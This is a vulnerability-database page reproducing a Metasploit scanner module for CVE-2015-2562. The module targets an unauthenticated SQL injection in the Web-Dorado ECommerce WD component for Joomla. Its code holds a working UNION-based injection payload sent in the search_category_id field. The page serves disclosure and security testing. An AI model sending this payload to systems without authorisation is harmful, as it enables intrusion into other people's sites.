Vulners
Lucene search
Web-Dorado ECommerce WD For Joomla! Search_category_id SQL Injection Scanner
🗓️ 01 Sep 2024 00:00:00Reported by bperry, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 154 Views
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
 | CVE-2015-2562 | 29 May 201815:50 | – | circl |
 | Multiple SQL Injection Vulnerabilities in Joomla! Web-Dorado ECommerce WD Components | 23 Mar 201500:00 | – | cnvd |
 | CVE-2015-2562 | 20 Mar 201514:00 | – | cve |
 | CVE-2015-2562 | 20 Mar 201514:00 | – | cvelist |
 | Web-Dorado ECommerce WD for Joomla! search_category_id SQL Injection Scanner | 28 Mar 201501:25 | – | metasploit |
 | CVE-2015-2562 | 20 Mar 201514:59 | – | nvd |
 | Sql injection | 20 Mar 201514:59 | – | prion |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'uri'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Web-Dorado ECommerce WD for Joomla! search_category_id SQL Injection Scanner',
'Description' => %q{
This module will scan for hosts vulnerable to an unauthenticated SQL injection within the
advanced search feature of the Web-Dorado ECommerce WD 1.2.5 and likely prior.
},
'Author' =>
[
'bperry'
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2015-2562']
],
'DisclosureDate' => '2015-03-20'))
register_options(
[
OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/'])
])
end
def run_host(ip)
left_marker = Rex::Text.rand_text_alpha(5)
right_marker = Rex::Text.rand_text_alpha(5)
flag = Rex::Text.rand_text_alpha(5)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST',
'vars_get' => {
'option' => 'com_ecommercewd',
'controller' => 'products',
'task' => 'displayproducts',
'Itemid' => '-1'
},
'vars_post' => {
'product_id' => '-1',
'product_count' => '',
'product_parameters_json' => '',
'search_name' => '',
'search_category_id' => "1) UNION ALL SELECT CONCAT(0x#{left_marker.unpack("H*")[0]},0x#{flag.unpack("H*")[0]},0x#{right_marker.unpack("H*")[0]})-- ",
'filter_filters_opened' => '0',
'filter_manufacturer_ids' => '1',
'filter_price_from' => '',
'filter_price_to' => '',
'sort_by' => '',
'sort_order' => 'asc',
'pagination_limit_start' => '0',
'pagination_limit' => '12'
}
})
unless res && res.body
vprint_error("Server did not respond in an expected way")
return
end
result = res.body =~ /#{left_marker}#{flag}#{right_marker}/
if result
print_good("Vulnerable to CVE-2015-2562 (search_category_id parameter SQL injection)")
report_vuln({
:host => rhost,
:port => rport,
:proto => 'tcp',
:name => "Web-Dorado ECommerce WD search_category_id SQL injection",
:refs => self.references.select { |ref| ref.ctx_val == "2015-2562" }
})
end
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Sep 2024 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 27.5
EPSS0.4354